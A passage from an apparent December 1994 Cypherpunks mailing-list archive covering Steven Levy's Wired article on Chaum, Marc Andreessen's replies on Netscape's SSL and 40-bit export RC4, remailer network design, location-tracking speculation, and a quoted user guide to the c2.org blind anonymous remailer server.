interviews (which were considerably lengthy) were quite cordial and not at all contentious. In fact, I think gracious would be be a better way to describe Chaum's behavior towards me. Perhaps John is thinking that David's reticence to publicly talk about some personal stuff is akin to rudeness. If that's what came out in the story, it was certainly unintentional. And I certainly hope I was not rude to Chaum in the article. I tried to portray him fairly, give him his say, and explain his work so that people would agree with me that it is extremely important. BTW, Chaum has indicated that he had no problem with the article. FROM KAWIKA DAGUIO: > > > > ******************************* >Whoa! Much of content of the discussions I had with Mr. Levy >concerned the importance of protecting privacy and security for >everyone. None of those comments made the cut. Yes, I have >concerns about fully anonymous digital cash, but while I am not a >full on crypto-anarchist, neither am I a crypto-facist. I confirm this, and it wasn't my intent to make Kawika a crusader against anonymity, but someone who, as he says, has concerns about anonymous cash. I've gotten some good feedback on the article, but unfortunately on the bio line Wired misspelled my email address (!) so I'm probably missing some of the best remarks. _______________________________________________________ Steven Levy steven at well.com steven at echonyc.com author, Hackers, Artificial Life, Insanely Great contributor, Macworld, Wired "When the going gets weird, the weird turn pro." _______________________________________________________ From marca at mcom.com Sun Dec 11 14:27:01 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:27:01 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <199412112227.WAA23971@neon.mcom.com> In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote: > It my personal feeling that Netscape doesn't have the right > talent mix to develop secure software. For example, they may well get > the RSA parts right, and then store the passphrase in a text file, > 'for ease of use.' My goodness, that's a bit malicious and unsubstantiated, isn't it? Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Sun Dec 11 14:32:19 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:32:19 PST Subject: BofA+Netscape In-Reply-To: <199412091814.NAA07757@hermes.bwh.harvard.edu> Message-ID: <199412112232.WAA24075@neon.mcom.com> In article <199412091849.KAA01760 at netcom15.netcom.com>, tcmay at netcom.com (Timothy C. May) wrote: > Netscape is seeking people to write this stuff, as we heard at the > last Cypherpunks meeting. So, this is the chance for Cyppherpunks to > see it done right. Absolutely. We certainly welcome any level of comments and criticism about the SSL protocol and our implementation, and we're recruiting for one or two more security experts to join us -- we'll be doing quite a bit of more advanced crypto over the next couple years, if all goes well. If anyone's interested, please drop me a note. (I should have sent info on what we're doing to this list sooner, btw -- I can only plead being busy as hell for the last 6 months trying to get the company up and running.) > I will speculate that Netscape, being a _very_ high-visibility > company, is in contact with the folks at RSA Data Security about this, > perhaps even using them to do the integration. (Recall that Bidzos is > involved in a couple of efforts along these lines.) They're certainly helping us, reviewing our proposals, etc. > (Ultra-speculative scenario: If I were the NSA/FBI/COMINT > establishment, anxious to ensure "escrowed access," Netscape is > something I'd be looking at. Ultra-speculatively, we should be on the > lookout for any evidence that Netscape will be deploying any kind of > "software key escrow" scheme, e.g., any links to the TIS proposals, to > Denning, etc. "GAKscape"?) No plans so far... Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From lmccarth at ducie.cs.umass.edu Sun Dec 11 14:38:49 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 14:38:49 PST Subject: DDJ on RC5 Message-ID: <199412112243.RAA25090@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Alan Olsen writes: > The January 1995 issue of Dr. Dobbs has tw articles of interest. [...] > - An article on RC5 by Ron Rivest! (Which includes source code!) Does it differ substantially from the code in the preprint, ftp://theory.lcs.mit.edu/pub/rivest/rc5/rc5.ps ? - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLut/PGf7YYibNzjpAQG6UwP/SR+SJoimlppN79PrW2B3W8otK3ZbkQX7 YTbdIy84mloYHLTLpY+XnzTSJ+yY6rarqi/QFia2MNpKoLySBmRVFU2LuGcZyj+b Xh3w7GPqJF3Re2acfdRicIjY3QTU3dryTqC9v9qEq90rCGWXZAHryoV7ALwPnoG0 UvxogTSS2bY= =5twK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuAdSoZzwIn1bdtAQHqdQF+MMVvMfQgFJF7sne7Dn0ACypFccBbWjgn TOc7YK2sL5RxxzNGyB+Bid+50vNT0rIt =1Fv5 -----END PGP SIGNATURE----- From marca at mcom.com Sun Dec 11 14:38:53 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:38:53 PST Subject: BofA+Netscape In-Reply-To: <199412101803.KAA06370@desiree.teleport.com> Message-ID: <199412112239.WAA24162@neon.mcom.com> In article <199412101803.KAA06370 at desiree.teleport.com>, alano at teleport.com (Alan Olsen) wrote: > If you check their WWW page, you will find information on the Secure Sockets > Layer. It explains the algorythm used (RC4) and key size (40 bits). SSL allows a number of choices for both algorithm and key size. See http://home.mcom.com/info/SSL.html. The version of Netscape you can pick up from our FTP server only implements 40-bit RC4 -- the 40-bit part resulting from standard export restrictions. We have implemented and will be shipping clients and servers with 128-bit RC4 and other configurations. Cheers, Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From marca at mcom.com Sun Dec 11 14:40:26 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:40:26 PST Subject: BofA+Netscape In-Reply-To: <199412101803.KAA06370@desiree.teleport.com> Message-ID: <199412112240.WAA24193@neon.mcom.com> In article <9412102351.AA09781 at snark.imsi.com>, perry at imsi.com wrote: > 40 bit RC4 will not stop any attacker with even moderate resources; > its crap. Agreed -- that's for the export version. US-only versions of both the client and the server will use higher key lengths. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From cactus at hks.net Sun Dec 11 14:43:22 1994 From: cactus at hks.net (L. Todd Masco) Date: Sun, 11 Dec 94 14:43:22 PST Subject: Broadcasts and the Rendezvous Problem Message-ID: <199412112248.RAA25113@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Timothy C. May writes: > Isn't this what "alt.anonymous.messages" is all about? > > (It's been at my Netcom site for many months now...I don't recall who > created it, but it seems to me it was one of us.) Alas, it is not available at MIT. I'll have to scrounge for a server that carries it (volunteerings of feeds welcome!); Though netcom is our IP provider, I'd rather not get news from them. > > Folks spend a lot of time bemoaning the transience of specific instances > > of remailer nodes: why not turn this into an advantage by architecting > > a network of system that is resilient against the destruction and/or > > compromise of individual nodes? > > I'm not sure what you mean by this. More remailers are always a good > thing, and offshore sites are especially good, but I'm not sure what > you mean by your last point. (Following details of the current system might be wrong. Please correct me where necessary.) My thought is this: If we were to design and implement a system, perhaps a two-tiered system with "fortress" and "intermediary" remailers as has been suggested, it's desirable to build a system that will continue to work even if a large portion of the nodes are removed (whether by Earthquake of Sun Devil). This is the system we'll have to build if we stop resisting the notion that remailers regularly come and go with little warning. The rendezvous problem is not currently addressed in a satisfactory way: premail/remailer-ping, or its equivalent, hardwires in the location of a known set of remailers and finds the subset that corresponds to remailers having a common characteristic (usually just whether they're working reliably or not). That's not a very good approach: a human has to add a new remailer into the "net" by adding it to the systems polled. Not only is the human intervention a Bad Thing, but having a central registry of remailers is bad infrastructure. A more "web-of-trust"-like mechanism is desirable. So, a dispersed view of the remailer net, both entry points and intermediary points, is necessary. In order to build such a system, we must solve the rendezvous problem: how does "premail++" know where to send its mail and how does remailer A know where to find remailer B (and B find exit point C)? This is where my train of thought dovetails with the newsgroup question: bringing a new remailer on line could be achieved by broadcasting a message through a newsgroup specifying the location and type of the remailer. If necessary, one or more pseudonymous automatic testing agents could pick up the message and put the remailer through a barrage of tests, broadcasting a "remailer certification" with a certain duration. "Premail++" and remailers could find their next hop by examining current certifications and choosing one with desired characteristics, scoring by trusted testing agents and other criteria (including the passage of time since the last certification). If an exit-remailer is chosen early in the game, multiple paths to the exit-remailer can be used to improve reliability (exit- remailers would also probably have a shorter cycle of certification). Technically, this is feasible. I could write the code fairly easily (though I'm not offering to do so at this time: if I do, pieces will be offered as fait accompli). My question is whether this strikes anybody else as a desirable design: we would end up with a net of remailers that is fairly resilient and not dependent upon any one list of remailers. If a node goes down, the net adjusts in rather short order and service is not disrupted. This picture needs to be fleshed out a bit more, but I thought I'd bounce this around before solidifying it in any particular way. - -- Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather cactus at hks.net | scornful tone, 'it means just what I choose it to mean - cactus at bb.com | neither more nor less.'" - Lewis Carroll - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuBmSoZzwIn1bdtAQEI9QF/fX2LPoUwzlKYJqJ1s0vb/mIX4NzT1jOo UNHdiOYNJ+vgpPQyIZ9OQynMuKfSVgU/ =vn6H -----END PGP SIGNATURE----- From marca at mcom.com Sun Dec 11 14:44:36 1994 From: marca at mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 14:44:36 PST Subject: BofA+Netscape In-Reply-To: <9412111550.AA29913@cfdevx1.lehman.com> Message-ID: <199412112245.WAA24292@neon.mcom.com> In article <9412111647.AA23311 at tadpole.tadpole.com>, db at Tadpole.COM (Doug Barnes) wrote: > I'll throw in that from the perspective of someone running a server, > their approach of requesting all graphics simultaneously over > different sockets in the name of client performance is disastrous. > This causes most servers to fork N times more per page, where N is > the avg. # of graphics. That's just plain not true. Servers don't fork any more often with Netscape than they do with other clients -- EVER. > but some have speculated that this was done deliberately in order > sabotage server software other than their own. That's also just plain not true, and completely unsubstantiated. Marc -- Marc Andreessen Netscape Communications Corp. Mountain View, CA marca at mcom.com From rah at shipwright.com Sun Dec 11 14:48:36 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 11 Dec 94 14:48:36 PST Subject: Real-time surveillance of the police Message-ID: <199412112247.RAA10653@zork.tiac.net> At 2:04 PM 12/11/94 -0800, Timothy C. May wrote: >This was an idea explored in detail by David Brin in 1990 in his novel >"Earth." Video cameras are ubiquitous and have a major effect on >casual street crime. Hard to forget Brin's description of little old ladies sitting on their front porches, "armed" will full-sensoria headgear, laying in wait for extremely uneducated juvenile miscreants... Humorous. >This scenario is a likely way that "position escrow" will evolve, from >a voluntary escrowing (incl. timestamping, etc.). "Those with nothing >to hide" will agree to escrow their movements...this will exculpate >them in suspected crimes, etc. A slippery slope. In "City of Angles", Kim Stanley Robinson(?) talks about just a virtuous all-surveilling governmental "privacy" authority which is supposed "protect" your privacy from the police, who had to subpoena the information to get it. > >On the topic of how these localizers actually work, I'm not at liberty >to talk about the technology. It's novel, and uses a *lot* if digital >signal processing. It doesn't use GPS and it's not a variant of >cellular telephones. I wonder if they're using an active/transponder system. That's what O'Niell's Geostar system was designed with in the early '80's. It would have put up cheaper sattellites and smaller earth transponders. The way you saved on transponder size was with very small bursts at very high power. You could send a signal to a small net of satellites 30,000 miles up with a box initially no bigger than an HP12C, and which would shrink more with time. The feds never liked Geostar 'cause they already had the passive/receiver GPS in the works, and they wanted to "amortize" the social cost of an essentially military (hence the requirement for a passive system) system on the backs of commerce. The only thing which saved GPS for mere mortals like us was the MIC's usual severe understimate of Grove's Law and the exponential cost effectiveness of integrated circuits over time. If my hunch is correct, with lots more local antennas, the power requirements of the tranceiver, and as a result, the tranceiver size, gets pretty small. Small enough to be worn on one's ankle. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From adam at bwh.harvard.edu Sun Dec 11 15:02:40 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 11 Dec 94 15:02:40 PST Subject: BofA+Netscape In-Reply-To: <199412112227.WAA23971@neon.mcom.com> Message-ID: <199412112302.SAA22764@bwh.harvard.edu> Marc Andreessen wrote: | In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote: | | > It my personal feeling that Netscape doesn't have the right | > talent mix to develop secure software. For example, they may well get | > the RSA parts right, and then store the passphrase in a text file, | > 'for ease of use.' | | My goodness, that's a bit malicious and unsubstantiated, isn't it? Maybe, but one, you substantiate it yourself, and two, I did say it is my personal feeling. I'll expand on it slightly by pointing to the fact that there have been potentially serious bugs in Mosiac. Thats understandable, writing really secure software that does lots of stuff based on potentially malicious input is a tough task. The fact that it is understandable does not make it acceptable.n Until you hire the experts mentioned below, I'll continue to assume that your talent mix does not include said experts. In message <199412112232.WAA24075 at neon.mcom.com> Marc Andreessen writes: >Absolutely. We certainly welcome any level of comments and >criticism about the SSL protocol and our implementation, and >we're recruiting for one or two more security experts to join >us -- we'll be doing quite a bit of more advanced crypto over >the next couple years, if all goes well. If anyone's >interested, please drop me a note. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jamesd at netcom.com Sun Dec 11 15:09:19 1994 From: jamesd at netcom.com (James A. Donald) Date: Sun, 11 Dec 94 15:09:19 PST Subject: BofA+Netscape In-Reply-To: <199412112239.WAA24162@neon.mcom.com> Message-ID: <199412112308.PAA28264@netcom10.netcom.com> Amanda complained that Netscape pisses all over the standardization committees. Well guys, the victor has room to move. It must come as a big shock to Apple, Microsoft, and IBM, but reality is that Netscape can set WWW standards and they cannot. If they indulge the standardization committees by listening to them first, and then deciding to ignore them, the committee should be thoroughly greatful. Marc Andreessen: Hey Mark, you are at netscape. Please, tell them about Debug Windows. Tell them that when debug windows issues a "Fatal Exit" error message this means that Netscape has trashed internal windows data, and that Windows may crash at any moment for any reason. There are no benign "Fatal Exit" warnings. If it does not crash your system, it will crash a customers system. I now have a policy of rebooting after every use of Netscape. This really bad -- though not as bad as waiting for Mosaic. to finish slooooowwwwwwwwwly loading some huge document. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From tcmay at netcom.com Sun Dec 11 15:16:08 1994 From: tcmay at netcom.com (Timothy C. May) Date: Sun, 11 Dec 94 15:16:08 PST Subject: Real-time surveillance of the police In-Reply-To: <199412112247.RAA10653@zork.tiac.net> Message-ID: <199412112314.PAA12746@netcom14.netcom.com> Robert Hettinga wrote: (quoting me) > >On the topic of how these localizers actually work, I'm not at liberty > >to talk about the technology. It's novel, and uses a *lot* if digital > >signal processing. It doesn't use GPS and it's not a variant of > >cellular telephones. > > I wonder if they're using an active/transponder system. That's what > O'Niell's Geostar system was designed with in the early '80's. It would > have put up cheaper sattellites and smaller earth transponders. The way > you saved on transponder size was with very small bursts at very high > power. You could send a signal to a small net of satellites 30,000 miles up > with a box initially no bigger than an HP12C, and which would shrink more > with time. I don't plan to say much more, and won't be playing the "Twenty Questions" game, but the system does _not_ use satellites or anything of that sort. Satellites up the ante considerably, and aren't even needed. Radio is enough to get 1% positional accuracy (or better) and radio can have better coverage in many places that GPS-like systems can't reach. > the backs of commerce. The only thing which saved GPS for mere mortals like > us was the MIC's usual severe understimate of Grove's Law and the ^^^^^^^^^^^ > exponential cost effectiveness of integrated circuits over time. A minor nit, but that's "Moore's Law," an empirical observation made by Gordon Moore, a founder of Intel and current Chairman, that integrated circuit capacities (roughly, number of transistors, bits, gates) were quadrupling every two years or so. Gordon had this posted outside his cubicle (the guy was worth $300 million then, and he worked in a Westinghouse-walled cubicle....I thought that was carrying egalitarianism a bit far...he's now worth $1.5 billion) and we all wondered when the trend chart would be broken. So far, it's been pretty accurate. But of course his trend chart ("Moore's Law," so dubbed by pundits around 1970, when he first showed his chart) is a conflation of a huge number of interesting trends in lithography, capital spending, microprocessor consumption, etc. > If my hunch is correct, with lots more local antennas, the power > requirements of the tranceiver, and as a result, the tranceiver size, gets > pretty small. Small enough to be worn on one's ankle. The transceivers get real small for other reasons, not because of satellites. Think about this: no reason to have satellites 100 miles overhead if there are thousands or tens of thousands of cooperating units nearby.... I won't say more for now about this, even though the patent filings may be accessible, and the work has been described at "Hackers" and a few other places (including Washington, at ARPA, who is also funding them--gulp). --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:17:03 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 15:17:03 PST Subject: Remailing Services Questions Message-ID: <199412112321.SAA25454@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Anonymous writes: > If you can, please also let us know if there is a way for us to subscribe > via an anonymous remailer to an address we designate, like for instance > with the command > > subscribe special at address.here > > where the special address given is obviously different from the one in the > header of the subscription message (which would merely be a remailer). Could you explain this a bit more ? I'm not sure what you're asking. > Does anyone know more about Sameer's C2-services? > In the interest of widespread usage, please post a summary to the entire > cypherpunks-list. Also urge others to copy, forward and post elsewhere. First, here's an excerpt from http://www.c2.org:80/services/: - - --- begin included text ----------------------------------------------------- Fully blind anonymity If you want to protect your privacy and still have mail go to your normal mailbox (either at work, at school, or through any other way you get internet mail), you can sign up for the blind anonymous server. You can set up an alias with us and mail to your alias will get to you, even though we have *no* idea who you are or where mail to you ends up going. This is available for only $10 for about every five megs of traffic which goes through the system. When you sign up you will get about one meg of free traffic. Also available is a Blind Server Client to make things easier. - - --- end included text ------------------------------------------------------- I reproduce below the current contents of http://www.c2.org/services/blindserver.html: - - --- begin included text ----------------------------------------------------- The Blind Anonymous Server by Sameer Parekh Copyright 1994 Introduction I hatched up the Blind Anon Server because of Eric Hughes's comments about the safety in ignorance. I wanted to run an anon server, maybe similar to Julf's remailer, but I did *not* want to know the connection between anon-ids and real IDs. I still wanted it to be easy to use so that someone who wanted to send mail to an anonymous person need only send it to a standard mail address, instead of using Hal's remailer return address block, which is an incredible pain to use. The system I have hatched up is relatively secure. If you take the proper steps to secure your identity from me, even if I were keeping complete logs, I would still know nothing of your true identity and if my records were subpoenaed, I could freely hand over the contents of my records without any worry that the privacy of my users will be violated. The system requires all commands to be pgp signed. Thus you will create a public/private keypair for your anonymous identity, and all administrative commands to the list regarding this identity must be signed by that key. You can send list commands from any address-- an anon remailer, a friend's address, Julf's remailer, whatever.. and as long as it is signed by your identity's key, all will be well. If you don't want to deal with every detail of the server, you can just use the blind client program that's been written to make using the server much easier. Setup First you have to create your alias on the anonymous server. Creating the alias is easy, but setting it up to work right takes a bit of effort and bookkeeping on your part. (Maybe I'll write a client which can take care of all the bookkeeping.) Create a pgp keypair with a User ID of the form "Psuedonym ". Send your public key to admin at omega.c2.org with the subject line, "addkey". This will create for you an anonymous id which can be accessed via "alias at omega.c2.org". You should only send one key to the server in any single addkey request. You have to choose an account name which hasn't been used before. In order to get the list of all account names which have been used and are not available, send a message with the subject "sendused address" to admin at omega.c2.org and the list of unavailable names will be sent to address, with the body of your request tacked on to the top, so you can use a remailer for the "address" and the body can be an encrypted mailing block-- you need not reveal your identity to me in any case. Starting an account gives you 1000 credits. Now if you would like to send a message to someone from your newly formed alias, you can send a signed message to the administration address (admin at omega.c2.org) with the "mailmessage" command. For example: ::mailmessage To: barney at black.net Subject: here's the plans to the stealth bomber Keywords: bomber Here's the plans... - - --END OF MESSAGE-- The message will be sent out from omega.c2.org just as if you had sent it out using a standard mail program from omega.c2.org. Then comes the more complex part. You have to tell my anonserver how mail to your alias will actually get to you. There are various levels of security which you can use. Because the remailernet is not very reliable, the idea is that you setup a number of paths which mail can get to you through, so that if one path goes down you can still use the other paths to get mail. You can either configure it so that mail to you goes through every path (for reliability with less security) or one path chosen at random (more secure but less reliable). To add a path to your list of paths, you must send a signed message to the list, with the lines ::addpath firsthop PATH INFORMATION GOES HERE - - --END OF PATH-- The firsthop is the first hop along the path between my anon server and you. It can be your address, in which case there is a good deal of reliability, but you get absolutely no good security. The "path information" is what gets tacked onto the top of the body before the message gets sent to the first hop. Suppose your firsthop was Hal's remailer, hfinney at shell.portal.com.. You would have something like: ::addpath hfinney at shell.portal.com :: Encrypted: PGP - - -----BEGIN PGP MESSAGE----- Version: 2.3a hEwCKlkQ745WINUBAfwPrO+z9LMBz7boyyC7gUqX/QCEZkXmJCeZYoskgtH5qqbi y4mYUL5a0ApbzrhPs8ULkPnW2c4Pfr1AfYSSgvrzpgAAAEvJtPOuQsW8IVQfl+iW CAr2gd5jax+t75qbux5U/RRxlbsq4cOeGrO/i/6Km6m71Vsdj0rquEQBvREnXxdj 81YsBM9QlFNxQAB8rrQ= =Ylli - - -----END PGP MESSAGE----- - - --END OF PATH-- That pgp message is encrypted for Hal's remailer. When Hal's remailer gets the message, it will have this block on the front of the body. Hal's remailer can then decrypt it.. Maybe on the inside of this block you can put: :: Anon-Send-To: So then there's only one remailer on the chain between myserver and your real address. For more security you can embed *another* hop to another remailer with another encrypted address block. This can continue for as long as you want. The longer the path, the more secure, but the less reliable. Once the path has been added, you will be sent mail (through the anon server) encrypted with your key (all mail to your alias will be sent out encrypted with your key) with the pathnumber that your command created. Store this path number in a safe place, because you will need to use it when you test all your paths for reliability. You can create multiple paths in this fashion. The remailer defaults to "spray" mode-- this means that mail to your alias will be sent through *each* of your paths. This adds reliability at the expense of security. (It makes traffic analysis easier.) If you would like to turn off spray mode, send a command to admin at omega.c2.org: ::randmode To turn spray mode on: ::spraymode You can actually use this spray mode for more than just an anon-server. If you'd like to create a mailing list, you can generate a keypair, distribute to everyone on the mailing list the secret key, and everyone can send into the anon server a path to themselves. Using spray mode, mail to the address will go out to every path. This of course means that anyone can subscribe or unsubscribe (Removing paths is described below) people to/from the list. The Credit Scheme When you startup an account, you get 1000 credits. When mail is sent out along one of the paths, credit is deducted from the account-- 1 credit per 512 bytes of traffic. Note that if you are in spray mode credits are deducted for every path which is active for your alias. If your account does not have enough credit, when a message comes in you will get mail detailing the size of the message that was lost and the amount of credits you have in your account. (Size is listed in 512 byte blocks) More credits will be added to your account upon receipt of payment for additional credits to your account. The one thousand credits is in general enough to take care of occasional mail using the 'nym. Only if you use the 'nym heavily should you expect to run out of credits. Removing paths If a certain path which you have active flakes out and becomes ineffective, you need some way of turning that path off so you're not paying for it in spray mode, and so you don't lose mail in random mode. That's what the disablepath command is for. To run the disablepath command you simply send the command (signed, as always) to admin at omega.c2.org: ::disablepath pathnumber Pathnumber, here, is the number of the path which was assigned when you created that path. Hence it is useful for you to keep good records of your active and disabled paths. It is possible to reenable a path once it has been disabled. In order to do this you need to remember the path number and the remailer that it's associated with. To recover a path you just send: ::recoverpath firsthop pathnum And the path with the number pathnum is reactivated, with the firsthop that you give it in the recover command. Path Verification You will likely want to keep tabs such that you know when a given path flakes out on you. For this reaon the "regping" option is available. This command lets you tell the system how often you want the anon-server to send a message through every path of yours, with the pathnumber in the message (encrypted, of course) so that you can keep tabs on which paths are flaking out on you. To set your ping frequency, use the regping command: ::regping frequency Where frequency can be none, hourly, daily, weekly, or monthly. Remember that you are still being charged for these testpings. The system defaults to weekly. To get a list of all your active paths, use the command "showpaths". This command will send out a listing of the pathnumber and first hop of each of your active paths: ::showpaths Defeating Traffic Analysis The system works in concert with remail at c2.org, which does the work to defeat traffic analysis. All mail to each path is first sent through remail at c2.org for added difficulty in traffic analysis. remail at c2.org is a standard cypherpunks remailer with PGP with a few added features. All outgoing mail is not delivered immediately upon receipt. Outgoing messages are stored in a pool until five minutes after each hour, when all messages in the pool are delivered in a random order, ignoring the order in which they came in. Every minute there is also a chance that a random uuencoded message is injected into the remailernet. Each message injected into the remailer net is sent through a random path of the remailers in the remailernet, usually between five and 20 hops. - - --- end included text ------------------------------------------------------ > Last, I support the idea of a while ago that the remailer-operators mailing > list should be open for public subscription so all those interested can get > on and follow what is happened there. But how do we subscribe? > Let us know, Sameer! remailer-operators is a Majordomo-managed list. Send mail to majordomo at c2.org with "subscribe remailer-operators" in the body to subscribe to the list. The list address is (surprise) remailer-operators at c2.org. Hope this helps. I don't know anything about the Extropia message pool, sorry. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuuINWf7YYibNzjpAQHhywP/W7F29XQGxxQ5m6trH4XgHaocfoSVr5h2 zSgjucQ3RkvNk++n8lX4LFKnqrd6s8tXoWm/dqKtUjLEOfP3lgLua3quh2x8PSSm zzjklsrrdhCxKo5wwaacgaq1DtUP2AjTHhxjh9OFmuiI7tqw/N0Br9RyuGyKYxdt LSvzP6e9+xA= =BszC - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuJeioZzwIn1bdtAQEXNAF/Q5ziXcXXBxdnV7bbNqZGMV8f9kJhD+d2 nfdNgEqH1183JG5AyMokIdsCqaEeM5qd =IKyL -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:22:19 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 15:22:19 PST Subject: Netscape competence Message-ID: <199412112326.SAA25467@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Marc Andreessen writes: > In article <199412091814.NAA07757 at hermes.bwh.harvard.edu>, adam at bwh.harvard.edu (Adam Shostack) wrote: > > > It my personal feeling that Netscape doesn't have the right > > talent mix to develop secure software. For example, they may well get > > the RSA parts right, and then store the passphrase in a text file, > > 'for ease of use.' > > My goodness, that's a bit malicious and unsubstantiated, isn't it? Excuse me, but Adam Shostack didn't write that paragraph you quoted. Amanda Walker did, as I recall. BTW, welcome to the list.... - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuuJZ2f7YYibNzjpAQERXQP/SJnxzt7tckazsBBtfQrKA3c08RLjYUs9 1xK3b/WqqFvmCDyMpwQg5yLzEk7uq7SFp725FMP/jZ8ZUnvpQGBxPdEaFOxpjlHU cPZOb1R1OzLQ2m0023H6LyBM3WMlCd7Nah+zOqaoTbQ1kofE9hZ2gXEfljurUy+8 7scWCfdrZfw= =sIUK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuuKryoZzwIn1bdtAQF/jgF/SPy47fk1vvZgyXl8UBBDuASGJn+COQC5 84E+ICfuxxvxR4GauaaLLwCPdzH4l1DL =KuB4 -----END PGP SIGNATURE----- From marca at neon.mcom.com Sun Dec 11 15:22:31 1994 From: marca at neon.mcom.com (Marc Andreessen) Date: Sun, 11 Dec 94 15:22:31 PST Subject: BofA+Netscape Message-ID: At 3:08 PM 12/11/94, James A. Donald wrote: >Amanda complained that Netscape pisses all over the >standardization committees. > >Well guys, the victor has room to move. It must come as a big >shock to Apple, Microsoft, and IBM, but reality is that Netscape >can set WWW standards and they cannot. > >If they indulge the standardization committees by listening to >them first, and then deciding to ignore them, the committee >should be thoroughly greatful. For the record, we're not trying to set standards -- we're trying to build products with functionality that our customers want and need. We'll succeed or fail on the basis of whether we do that, not whether or because we set standards. We fully realize that being proprietary or isolated from existing or future standards only locks us out of our market, which does us no good at all. That doesn't mean that we're not going to innovate when we need to, but it means we're not going to be anything other than totally open and standards-compliant. To that end, we aggressively support all current standards (HTML, HTTP, URLs, NNTP, Gopher, SOCKS, FTP, you name it), are a charter member of W3O (with a concomitant $150K commitment), and from day 1 have made SSL available to the broader community and have given it to the W3O security working group (of which we are a full participant) exactly in parallel with SHTTP and the three or four other proposals that have been submitted for consideration by other companies and third parties. I fully expect we'll be supporting other security standards and approaches as they emerge, and we certainly welcome realistic suggestions on what we should do, when, and how. Cheers, Marc -- Marc Andreessen Netscape Communications Corporation Mountain View, CA marca at mcom.com From lmccarth at ducie.cs.umass.edu Sun Dec 11 15:25:38 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Sun, 11 Dec 94 15:25:38 PST Subject: Netscape competence Message-ID: <199412112330.SAA25547@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Adam Shostack writes: > Until you hire the experts mentioned below, I'll continue to > assume that your talent mix does not include said experts. Whoops, sorry, Marc A. had the attribution correct after all. Amanda W. made some similar comments, but apparently I'm conflating the two. Please ignore my prior message. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuuKRWf7YYibNzjpAQEU/AQA5T/HnMDdRp2xMkDO7//G0ycCZnkEUwpv bz0MG8mUDE6XD2iTMCt/+VUDk6sx5BpNrofZOx0A57/XYsAxc0WsXk0Rb0Kh6o7x sPFTL6BJq97sFYbObO2uXvN5bbEQ1CL40rfZghds+exWhNix2fiNfy3SSaihd+qR kZl7CiLt7wY= =V6JA - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- 